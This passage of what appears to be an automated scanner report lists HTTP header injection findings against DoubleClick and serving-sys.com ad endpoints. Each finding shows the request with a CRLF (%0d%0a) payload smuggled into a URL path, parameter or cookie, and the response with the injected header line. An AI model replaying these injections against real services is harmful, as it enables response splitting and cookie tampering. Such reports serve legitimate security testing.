/ocr.sant.ocregister/homepage:
Date: Thu, 03 Feb 2011 19:03:57 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.30. http://ad.doubleclick.net/jump/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N3867.605.ACCUWEATHER/B5097428.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7839e%0d%0a13e7a69b9b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7839e%0d%0a13e7a69b9b/N3867.605.ACCUWEATHER/B5097428.13;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7839e
13e7a69b9b
/N3867.605.ACCUWEATHER/B5097428.13%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:50 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.31. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 65bdc%0d%0a9a784ec95fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /65bdc%0d%0a9a784ec95fb/N884.AccuWeather/B4902356.13 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/65bdc
9a784ec95fb
/N884.AccuWeather/B4902356.13:
Date: Thu, 03 Feb 2011 19:03:40 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.32. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.14 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.14

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8f012%0d%0aa7185e3a5c9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8f012%0d%0aa7185e3a5c9/N884.AccuWeather/B4902356.14;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8f012
a7185e3a5c9
/N884.AccuWeather/B4902356.14%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:37 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.33. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 24bce%0d%0a68ef865ea3b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /24bce%0d%0a68ef865ea3b/N884.AccuWeather/B4902356.6;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/24bce
68ef865ea3b
/N884.AccuWeather/B4902356.6%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:47 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.34. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.67 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.67

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3f7d8%0d%0a26ff44bf3ad was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3f7d8%0d%0a26ff44bf3ad/N884.AccuWeather/B4902356.67 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3f7d8
26ff44bf3ad
/N884.AccuWeather/B4902356.67:
Date: Thu, 03 Feb 2011 19:03:46 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.35. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.7 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9eb91%0d%0a378d55f361c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9eb91%0d%0a378d55f361c/N884.AccuWeather/B4902356.7 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9eb91
378d55f361c
/N884.AccuWeather/B4902356.7:
Date: Thu, 03 Feb 2011 19:03:44 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.36. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.71 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.71

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3f3a1%0d%0a3af708ef023 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3f3a1%0d%0a3af708ef023/N884.AccuWeather/B4902356.71 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3f3a1
3af708ef023
/N884.AccuWeather/B4902356.71:
Date: Thu, 03 Feb 2011 19:03:41 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.37. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.72 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.72

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5a6e8%0d%0a73f07475f21 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5a6e8%0d%0a73f07475f21/N884.AccuWeather/B4902356.72;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5a6e8
73f07475f21
/N884.AccuWeather/B4902356.72%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:42 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.38. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.73 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.73

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 27833%0d%0a886ea4e3f1b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /27833%0d%0a886ea4e3f1b/N884.AccuWeather/B4902356.73;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/27833
886ea4e3f1b
/N884.AccuWeather/B4902356.73%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:42 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.39. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.74 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N884.AccuWeather/B4902356.74

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 593ee%0d%0afae69de04e9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /593ee%0d%0afae69de04e9/N884.AccuWeather/B4902356.74;sz=1x1;ord= HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/593ee
fae69de04e9
/N884.AccuWeather/B4902356.74%3Bsz%3D1x1%3Bord%3D:
Date: Thu, 03 Feb 2011 19:03:46 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.40. http://ad.doubleclick.net/jump/locm.pp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/locm.pp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8e548%0d%0a0b5406658fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8e548%0d%0a0b5406658fb/locm.pp HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8e548
0b5406658fb
/locm.pp:
Date: Thu, 03 Feb 2011 16:08:51 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.41. http://ad.doubleclick.net/jump/locm.sp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/locm.sp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4cb86%0d%0a56daa9c4c90 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4cb86%0d%0a56daa9c4c90/locm.sp HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4cb86
56daa9c4c90
/locm.sp:
Date: Thu, 03 Feb 2011 16:08:45 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.42. http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/locm.sp/retail_banks_15020100

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2c034%0d%0a52d83d7cc34 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2c034%0d%0a52d83d7cc34/locm.sp/retail_banks_15020100 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2c034
52d83d7cc34
/locm.sp/retail_banks_15020100:
Date: Thu, 03 Feb 2011 16:08:49 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.43. https://ad.doubleclick.net/activity [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ad.doubleclick.net
Path:   /activity

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload ecc0c%0d%0acf3d6eb0e23 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /activity;src=2549153;type=initi091;cat=landi727;ord=1;num=&ecc0c%0d%0acf3d6eb0e23=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://ad.doubleclick.net/activity;src=2549153;type=initi091;cat=landi727;ord=1;num=&ecc0c
cf3d6eb0e23
=1&_dc_ck=try:
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Thu, 03 Feb 2011 13:32:55 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 03 Feb 2011 13:17:55 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


1.44. https://ad.doubleclick.net/activity [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://ad.doubleclick.net
Path:   /activity

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 1c6ea%0d%0a39d8322a44 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /activity;src=1c6ea%0d%0a39d8322a44 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://ad.doubleclick.net/activity;src=1c6ea
39d8322a44
&_dc_ck=try:
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Thu, 03 Feb 2011 13:32:55 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 03 Feb 2011 13:17:54 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close


1.45. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerRedirect.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 7e614%0d%0a039b9159693 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerRedirect.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=07e614%0d%0a039b9159693; B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ8i440000000001t2852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF82980000000001t3852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001gYyfadw90cvM00001gL2MadKj0bdR00001fU+La50V0a+r00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; u2=af46648c-e211-44c6-8697-3388c9d721d93Gw030; C4=; ActivityInfo=000p81bBo%5f; u3=1;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=07e614
039b9159693
; expires=Wed, 04-May-2011 14:04:16 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=af46648c-e211-44c6-8697-3388c9d721d93Gw03g; expires=Wed, 04-May-2011 14:04:16 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 19:04:16 GMT
Connection: close


1.46. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 15095%0d%0aec9ed734f69 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=015095%0d%0aec9ed734f69; B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ8i440000000001t2852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF82980000000001t3852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001gYyfadw90cvM00001gL2MadKj0bdR00001fU+La50V0a+r00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; u2=af46648c-e211-44c6-8697-3388c9d721d93Gw030; C4=; ActivityInfo=000p81bBo%5f; u3=1;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=015095
ec9ed734f69
; expires=Wed, 04-May-2011 14:04:15 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: u2=af46648c-e211-44c6-8697-3388c9d721d93Gw03g; expires=Wed, 04-May-2011 14:04:15 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_=BlankImage
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 19:04:14 GMT
Connection: close


1.47. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 4724b%0d%0a3b29ba82741 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2105928&PluID=0&w=728&h=90&ord=634323295494618321&ucm=true&ncu=$$http://a1.interclick.com/icaid/145344/tid/ba650ae4-f985-4f21-8de8-e2f82579ce26/click.ic?$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=2;dcode=ocr;pcode=sant;kw=;ref=;test=;fci=ad;dcopt=;tile=5;sz=728x90;c1=uncategorized;ord=462404263671487.56?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bBo%5f; eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=04724b%0d%0a3b29ba82741; A3=f+JvabEk02WG00002h5iUabNz07l00000Qh5j3abNz07l00000.gYyfadwa0cvM00001gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001gYx+adw90cvM00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ8i440000000001t2852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.83xP0000000001sF8cVQ0000000001sV852N0000000001s.87ma0000000001s.6o.Q0000000001sY7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=408&BWDate=40573.510532&debuglevel=&FLV=10.1103&RES=128&WMPV=04724b
3b29ba82741
; expires=Wed, 04-May-2011 13:53:46 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gL2LadMx0bdR00001gNfHaaiN0aVX00001gn3Ka4JO09MY00001gYyfadw90cvM00001fU+La50V0a+r00001gYx+adw90cvM00001fUFGa50V02WG00001gy3.ach00c9M00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001ge4Hack+0bM000001; expires=Wed, 04-May-2011 13:53:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ8i440000000001t2852G0000000003sS7dNH0000000002sZ7GHq0000000001s.7FCH0000000001s.8cVQ0000000001sV83xP0000000001sF82980000000001t3852N0000000001s.6o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG852z0000000001sS852A0000000001sS; expires=Wed, 04-May-2011 13:53:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Wed, 04-May-2011 13:53:46 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 18:53:46 GMT
Connection: close
Content-Length: 1881

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

1.48. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload 50450%0d%0aeb4b41840dc was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4386992~~0~~~^ebAdDuration~3~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.25563961919397116&flv=50450%0d%0aeb4b41840dc&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=2;dcode=ocr;pcode=sant;kw=;ref=;test=;fci=ad;dcopt=;tile=5;sz=728x90;c1=uncategorized;ord=462404263671487.56?
Origin: http://ad.doubleclick.net
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=43909ba7-724d-4dce-bc5a-33ff68e4804e3Gw020; expires=Wed, 04-May-2011 13:53:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=50450
eb4b41840dc
&RES=128&WMPV=0; expires=Wed, 04-May-2011 13:53:45 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 18:53:45 GMT
Connection: close
Content-Length: 0


1.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 5ce92%0d%0a3da8f15de52 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4386992~~0~~~^ebAdDuration~3~0~01020^ebRichFlashPlayed~0~0~01020&OptOut=0&ebRandom=0.25563961919397116&flv=10.1103&wmpv=0&res=5ce92%0d%0a3da8f15de52 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage;s1=homepage;pos=2;dcode=ocr;pcode=sant;kw=;ref=;test=;fci=ad;dcopt=;tile=5;sz=728x90;c1=uncategorized;ord=462404263671487.56?
Origin: http://ad.doubleclick.net
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=ca112895-8f52-433d-95cd-db7dc6aa59dd3Gw070; expires=Wed, 04-May-2011 13:53:46 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=5ce92
3da8f15de52
&WMPV=0; expires=Wed, 04-May-2011 13:53:46 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 03 Feb 2011 18:53:45 GMT
Connection: close
Content-Length: 0


1.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

